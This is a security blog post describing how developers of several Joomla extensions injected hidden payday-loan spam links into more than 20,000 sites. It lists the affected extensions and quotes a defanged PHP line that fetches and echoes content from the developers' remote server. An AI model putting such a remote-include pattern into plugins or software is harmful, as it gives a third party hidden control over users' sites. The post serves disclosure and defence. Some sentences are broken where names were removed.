The Latest in IT Security

When Good Plugins Go Bad – SEO Spam on Joomla Websites


We recently published an article about an interesting case where a very popular WordPress Plugin (Social Media Widget), with more than 900,000 downloads, got sold and the new owners decided to use their big audience and inject spam on all the sites using the plugin.

If you read the post, you will see how they went about injecting those “pay day loan” SPAM links to What’s even more scary is that in one day, the number of backlinks to, increased from 0 to almost 450k, according to

Loan Spam

This gives you an idea of how big a targeted SEO Spam attack can be.

Spam SEO Attacks on Joomla sites

Unfortunately, this story is not new. One of our readers pointed us to a very similar case that happened in the Joomla ecosystem just a few weeks before. In similar fashion, the campaign was able to infiltrate more than 20,000 sites. The developers involved were from many popular Joomla extensions: (author: Sharif Mamdouh):
– AddThis For Joomla!
– Share This for Joomla!
– iNowSlider (mod_iNowSlider)
– iNow Twitter Widget (mod_TwitterWidget)
– BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
– Quotes By keyWord! (mod_JoomlaQuotes)
– iNow Wikio (mod_JoomlaWikio)
– iNow Twitter (mod_TwitterForJoomla)
– QuickJump for Joomla! (mod_quickjump) (author: xing):
– VirtueMart Advanced Search
– Skitter Slideshow
– FaceBook Slider
– Twitter Friends & Followers
– Flying Tweets
– Autson Twitter Search
– Twitter Quote
– FaceBook Show
– Plimun Twitter Ticker
– Twitter Show
– Nivo Slider

These guys tried to leverage their user base to inject the same type of SPAM seo (pay day loans) into any site running their extension[s]. In this case, the hidden backlinks were being called from:

$credit=file_get_contents(“httx://www.inowweb. com/p.php?i=”.$path);
echo $credit;

This allowed the extension developers to control and choose what to be displayed on any site using their software. The Joomla security team also reacted fast and banned these developers and their associated extensions.

Restricting the usage of Extensions

We have been talking about this for a while, but it is important to repeat. Limit your usage of extensions (or plugins), along with all other third party components, and only use from trusted sources. More importantly, only if you need the said functionality. The less plugins you have configured in your environment, the less chances you have to be caught in a similar situation. The last thing you want is to become part of a SPAM botnet.

If you are unsure if your site is showing those spammy keywords, you can scan it for free here:

Leave a reply


THURSDAY, MAY 23, 2024

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments